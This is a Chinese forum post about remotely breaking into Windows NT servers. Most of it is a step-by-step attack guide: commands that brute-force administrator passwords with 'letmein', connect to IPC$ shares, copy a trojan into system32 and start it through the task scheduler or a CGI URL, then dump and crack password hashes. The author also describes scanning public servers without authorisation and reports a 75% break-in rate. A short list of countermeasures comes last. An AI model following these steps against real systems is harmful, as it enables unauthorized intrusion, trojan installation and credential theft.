找回密码
 注册

QQ登录

只需一步,快速开始

远程入侵NT ----spp(低音炮)

[复制链接]
发表于 2011-1-12 16:31:02 | 显示全部楼层 |阅读模式
看了篇文章介绍使用netbus 或 netspy 远程入侵nt系统,感觉真是。。看来nt系统的共享机制如果不配合火墙使用,SMB会给你造成很大麻烦。。 连小小 只的木马都可以让nt管理员头大。
5 F- R4 s, q9 N0 u( ]    其攻击过程如下:
9 [; {  |" l0 Z4 }: P: a$ \- z0 N9 S1、使用扫描工具查找NT主机       * `1 t* M, e7 ^
2 、确定攻击目标后,使用letmein 对目标主机进行攻击, 如:
, v  c: M8 _$ n& e4 r9 gletmein file://x.x.x.x/ -all -g mypwd (对\\x.x.x.x上所有用户攻击)
# ]4 H5 {: ?+ F1 z+ Gletmein file://x.x.x.x/ -admin -g mypwd (对\\x.x.x.x上管理员攻击) 2 g- s8 j3 w2 e0 d
letmein file://x.x.x.x/ -all -d mypwd (显示\\x.x.x.x上所有用户) 0 C3 k' D+ q% c6 d8 x; [
注:- 确定目标后,收集目标信息并尝试取得非法资源 , `$ c* A8 M3 v1 f
3、当letmein 获取相关管理员权限后,使用ms提供的合法命令:
& E+ W4 s7 ~1 s3 k5 d3 \; e' M3 hnet use \\x.x.x.x\ipc$ "pass"/user:"user" 连接远程资源并将木马拷入远程
: O) f1 N2 C4 w' q  ?0 Ocopy x:\netserver.exe \\x.x.x.x\admin$\system32
. G+ X' i) O9 M+ i  X/ \+ Y4、使用合法ms命令远程启动木马服务:
+ N- t8 c2 Z5 @/ \/ z9 X3 Anetsvc \\x.x.x.x schedule /start at \\x.x.x.x hh:mm netserver.exe /port:yourport /nomsg
& L% |/ f5 o' A2 q: {' |/ l  G0 f7 M2 {8 Z4 H
   该方法有其巧妙之处。。利用nt的任务计划管理,在特定时候启动木马服务
$ u* E! R& t4 [0 F' S: c$ d2 I& G4 k  X( h6 n4 P
   另一种方法:
8 L/ F* {7 c! U2 U3 C" E   将ntsrver.exe 或其他运行程序Copy到目的服务器的www可执行目录, 如cgi-bin或scripts,然后在浏览器键入url如: http://x.x.x.x/scripts/ntsrver.exe /port:yourport 或 http://x.x.x.x/cgi-gin/ntsrver.exe /port:yourport 木马服务将被启动
7 Q6 D% t' p3 ?: v. y3 ^# ?6 {. I! B6 q
    到此,该次攻击可以算成功了,远程资源已在别人控制下。
' h* O9 L! P: ?: Z& X2 m( T- [    如果在远程使用app redirect 启动一个cmd.exe到特定端口 , 那么你可以telnet 到该端口,更方便使用该远程资源 。比如:使用pwdump 将远程nt上所有用户和密码 dump成文件,回传本地,使用其他工具如l0phtcrack来运算。 分析该次攻击的整体过程,不难看出,关键步骤是letmein取得admin权限,但是很不幸,就目前厦门(有些是省内)的nt服务器管理员而言,密码对letmein只是多花几分钟而已。我对某些大的公共平台服务器进行扫描的结果,除了solaris和linux系统之外,其余的nt被letmein猜中率有75%以上。而且在这些被进入的机器上,SMB都有在tcp/ip上 跑,有两台有配备火墙,但是没有封闭对外137-139口。 0 ]" a& s  ]$ j) f( u( F1 |5 _: [8 u
! e) g+ ~+ j+ P7 L' O- F1 Q
     对策:
) z  ?* `: P- s6 D1、还是老话,密码的选择问题,使用向..@2KjsfiM7v!09..这样的密码会让任何使用 暴力法计算的机器算到cpu烧掉。 . o$ d0 E  V; l8 I7 G
2、nt网络的适当配置,不要在对外的nc绑定共享服务是个好习惯,特别是tcp/ip协议。 & y! Y3 }0 L& A) n
3、防火墙的配置,屏蔽一切不需要的服务端口,象netebui在tcp/ip上的137-139口,开这些口只会使你的系统处于危险的处境,如果非要在远程使用这些口的服务,建议使用其他软件来代替。 2 g# I3 |# f) B: f$ g% `" q. T
4、及时检查日记和监控服务的运行,定时对文件系统的权限受托关系进行检查。 / S/ ?. t2 m  r$ v. A  l
5、管理人员素质的提高,安全风险意思加强无疑对你管理的系统有很多好处。 -- SPP 10Hz的低频 你听不到的声音却无时不刻在影响着你 。( P" w* [- ~/ }+ N4 R* e6 \9 u8 }
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|本地广告联系: QQ:905790666 TEL:13176190456|Archiver|手机版|小黑屋|汶上信息港 ( 鲁ICP备19052200号-1 )

GMT+8, 2026-6-14 23:34

Powered by Discuz! X5.0

© 2001-2026 Discuz! Team.

快速回复 返回顶部 返回列表